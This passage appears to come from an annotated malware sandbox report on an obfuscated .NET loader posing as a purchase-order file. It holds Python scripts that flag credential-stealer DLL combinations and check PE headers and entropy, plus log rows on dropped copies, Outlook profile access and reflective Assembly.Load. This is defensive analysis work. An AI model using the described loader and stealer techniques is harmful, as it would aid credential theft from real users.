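    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        dlls = per_proc.setdefault(m.group("proc"), [])
        dll = m.group("dll").lower()
        if dll not in dlls:
            dlls.append(dll)
    return per_proc


def capabilities(dlls) -> dict:
    """Project a DLL list onto the capability table; only matched capabilities are returned."""
    found = {}
    for cap, members in CAPABILITIES.items():
        hits = sorted(d for d in dlls if d in members)
        if hits:
            found[cap] = hits
    return found


def triage(log: str) -> dict:
    """Per-process summary plus flags; the path markers and the 3-of-4 rule are assumptions."""
    report = {}
    for proc, dlls in parse_loaded(log).items():
        caps = capabilities(dlls)
        flags = []
        if any(marker in proc.lower() for marker in USER_WRITABLE):
            flags.append("runs from a user-writable directory")
        combo = STEALER_COMBO & set(caps)
        if len(combo) >= 3:
            flags.append("stealer-like module set: " + ", ".join(sorted(combo)))
        report[proc] = {"dlls": dlls, "capabilities": caps, "flags": flags}
    return report


if __name__ == "__main__":
    for proc, summary in triage(SAMPLE_LOG).items():
        print(proc)
        for cap, hits in summary["capabilities"].items():
            print(f"  {cap:<20} {', '.join(hits)}")
        for flag in summary["flags"]:
            print(f"  !! {flag}")
```

Run against the full report, the dropped copy in AppData\Roaming scores on all three of credential vault, SSPI and WMI, which is the combination a credential stealer needs and an ordinary WinForms application does not; the first-stage sample on the Desktop mainly shows the network and NTLM side. Treat the table as a starting point to extend, not as a detection rule on its own: every DLL in it is also loaded by legitimate software.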
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static file information: File size 1083392 > 1048576
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106600
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer325DA9 source: powershell.exe, 00000001.00000002.1778310849.0000000007981000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1777916558.0000000007926000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: LrBtUp.pdb source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: LrBtUp.pdbSHA256 source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbd source: powershell.exe, 00000001.00000002.1780173033.0000000008832000.00000004.00000020.00020000.00000000.sdmp
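The static rows above (a COM descriptor directory, a .text section over 1 MiB in both virtual and raw size, the DllCharacteristics flags, a debug directory) and the ".text entropy: 7.918" and "High entropy of concatenated method names" rows in the Data Obfuscation section below all come from header fields and byte statistics that are cheap to reproduce. The script below is an added example, not Joe Sandbox's implementation: it walks the PE headers with only the standard library, computes Shannon entropy per section and over a list of method names, and assembles a small synthetic PE32 image in memory so it can run offline. That synthetic image is constructed test input; it is not the report's sample, and the 7.0 entropy cut-off is this example's own choice.

```python
"""Added example (not the Joe Sandbox implementation): the static PE checks
listed in the report, re-done with only the Python standard library.
build_pe() assembles a minimal synthetic PE32 image (constructed test input,
not the report's sample) so the script runs without any file on disk.
"""
import math
import struct
from collections import Counter

DIR_DEBUG, DIR_COM_DESCRIPTOR = 6, 14          # IMAGE_DIRECTORY_ENTRY_* indices
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
ONE_MIB = 0x100000
ENTROPY_CUTOFF = 7.0                            # assumption: above this, treat as packed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def concatenated_name_entropy(names) -> float:
    """Entropy of all identifiers joined, the measure behind the 'High entropy of
    concatenated method names' rows: renamed identifiers look like random text."""
    return shannon_entropy("".join(names).encode("utf-8"))


def parse_pe(blob: bytes) -> dict:
    """Minimal PE header walk (PE32 and PE32+); raises ValueError on non-PE input."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", blob, opt)[0] == 0x20B
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]        # same offset in PE32 and PE32+
    nrva_off = opt + (108 if pe32plus else 92)                     # NumberOfRvaAndSizes
    nrva = struct.unpack_from("<I", blob, nrva_off)[0]
    dirs = [struct.unpack_from("<II", blob, nrva_off + 4 + 8 * i) for i in range(min(nrva, 16))]
    sections = []
    for i in range(nsect):                                         # 40-byte IMAGE_SECTION_HEADERs
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": rawsize,
                         "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize])})
    has_dir = lambda idx: idx < len(dirs) and dirs[idx] != (0, 0)
    return {"pe32plus": pe32plus,
            "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
            "is_dotnet": has_dir(DIR_COM_DESCRIPTOR), "has_debug_dir": has_dir(DIR_DEBUG),
            "sections": sections}


def static_findings(blob: bytes) -> list:
    """Produce rows in the spirit of the report's 'Static PE information' entries."""
    info = parse_pe(blob)
    out = []
    if info["is_dotnet"]:
        out.append("data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (managed .NET image)")
    if info["has_debug_dir"]:
        out.append("data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG")
    out.append("DllCharacteristics: " + ", ".join(info["dll_characteristics"]))
    if len(blob) > ONE_MIB:
        out.append(f"file size {len(blob)} > {ONE_MIB}")
    for s in info["sections"]:
        if s["virtual_size"] > ONE_MIB:
            out.append(f"virtual size of {s['name']} is bigger than 0x{ONE_MIB:x}")
        if s["raw_size"] > ONE_MIB:
            out.append(f"raw size of {s['name']} is bigger than 0x{ONE_MIB:x}")
        if s["entropy"] > ENTROPY_CUTOFF:
            out.append(f"section {s['name']} entropy {s['entropy']:.3f} (packed or encrypted payload likely)")
    return out


def build_pe(sections, dll_chars=0x8540, dotnet=True, debug=True) -> bytes:
    """Assemble a minimal PE32 image in memory (constructed test input; not loadable)."""
    file_align, e_lfanew, opt_size = 0x200, 0x80, 96 + 16 * 8
    headers_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    size_of_headers = -(-headers_end // file_align) * file_align
    hdrs, raw, ptr, rva = b"", b"", size_of_headers, 0x1000
    for name, data in sections:
        padded = data + b"\0" * (-len(data) % file_align)
        hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), rva,
                            len(padded), ptr, 0, 0, 0, 0, 0x60000020)
        raw, ptr, rva = raw + padded, ptr + len(padded), rva + -(-len(data) // 0x1000) * 0x1000
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)   # ImageBase, alignments
    struct.pack_into("<II", opt, 56, rva, size_of_headers)            # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 2, dll_chars)                    # Subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    if debug:
        struct.pack_into("<II", opt, 96 + 8 * DIR_DEBUG, 0x3000, 28)
    if dotnet:
        struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, 0x2000, 72)
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    return (dos + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(size_of_headers, b"\0") + raw


if __name__ == "__main__":
    sample = build_pe([(b".text", bytes(range(256)) * 4200), (b".rsrc", b"A" * 1024)])
    for finding in static_findings(sample):
        print(finding)
    obfuscated = ["OjS0MRIe08", "ttH0YsScod", "aqiuUA1i5l", "YFQuRkh1l5", "uHn0PU2yyA",
                  "fo907Zl2Ch", "uQO0IVvKe2", "yIK0Zytajp", "E2C01vicDf", "jDF0je48LY"]
    plain = ["InitializeComponent", "Dispose", "ToString", "GetEditStyle"]
    print(f"obfuscated names: {concatenated_name_entropy(obfuscated):.2f} bits/char, "
          f"plain names: {concatenated_name_entropy(plain):.2f} bits/char")
```

To use it on a real file, replace the synthetic image with `open(path, "rb").read()`. Two caveats a practitioner would add: a large, high-entropy .text section in a managed image usually means the visible assembly is a loader carrying an encrypted payload (consistent with the `Assembly.Load(byte[])` rows below), while a high-entropy .rsrc can just as well be a compressed icon or embedded image, so the section name matters; and the name-entropy measure is a rough heuristic, since the obfuscated names taken from the Data Obfuscation section score around 5.3 bits per character against roughly 4.1 for the four unrenamed names.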

                      Data Obfuscation

                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, JwlrlmCCKvmG8rWaC9.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ListagemTarefas.cs | .Net Code: InitializeComponent
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs | .Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs | .Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs | .Net Code: urEOmDpUy0 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Code function: 0_2_0127A16E push ecx; retf 0_2_0127A16F
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Code function: 0_2_0127C45F push cs; retf 0_2_0127C46E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF5A98 push edi; iretd 1_2_04CF5A3E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF3AA8 push ebx; retf 1_2_04CF3ADA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF42BF push ebx; ret 1_2_04CF42DA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF5A2C push edi; iretd 1_2_04CF5A32
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF5A3B push edi; iretd 1_2_04CF5A3E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF5A37 push edi; iretd 1_2_04CF5A3A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04CF5A33 push edi; iretd 1_2_04CF5A36
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 5_2_02C8DC5C pushfd ; iretd 5_2_02C8F171
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: section name: .text entropy: 7.918254359877085
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, Ce2Xf9cjqybYAM3F2w.cs | High entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, leE21PHPPCCd9mfVUy.cs | High entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, aVADjOVDuEeZsiv9gr.cs | High entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, YUIl37IKJYjF8xf27m.cs | High entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, mxKMTujwPb7MXUpb3w.cs | High entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, yF83lkDx7U66ctmbMp.cs | High entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, WTWIs8ORlK2dCEydd1.cs | High entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, zntx6TZ7Lbd4cPomW6.cs | High entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, utfVXMWZH8mR5jCuu6.cs | High entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, Kq767ssRxj1nqny8Z0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, GegNK9MHS8xGZZ61Gq.cs | High entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, HlWFR4vQIClmUuPwY7.cs | High entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, h3P7Jmyj3XGBVnMunY.cs | High entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, DYw0y6Y5vgvWOsT0qF.cs | High entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, WVm6LK3lT2Kovi1yt2.cs | High entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, NLLDLSGhLjNiFkvCP0.cs | High entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, tDsfXfqDOSPinCLHbV.cs | High entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, crOaocRUBdtAijCEKeb.cs | High entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, qgQCdRR9ohCEh5iiW3H.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, TDUwymQgqk3Z3KoOJH.cs | High entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, Ce2Xf9cjqybYAM3F2w.cs | High entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, leE21PHPPCCd9mfVUy.cs | High entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, aVADjOVDuEeZsiv9gr.cs | High entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, YUIl37IKJYjF8xf27m.cs | High entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, mxKMTujwPb7MXUpb3w.cs | High entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, yF83lkDx7U66ctmbMp.cs | High entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, WTWIs8ORlK2dCEydd1.cs | High entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, zntx6TZ7Lbd4cPomW6.cs | High entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.cs | High entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, Kq767ssRxj1nqny8Z0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
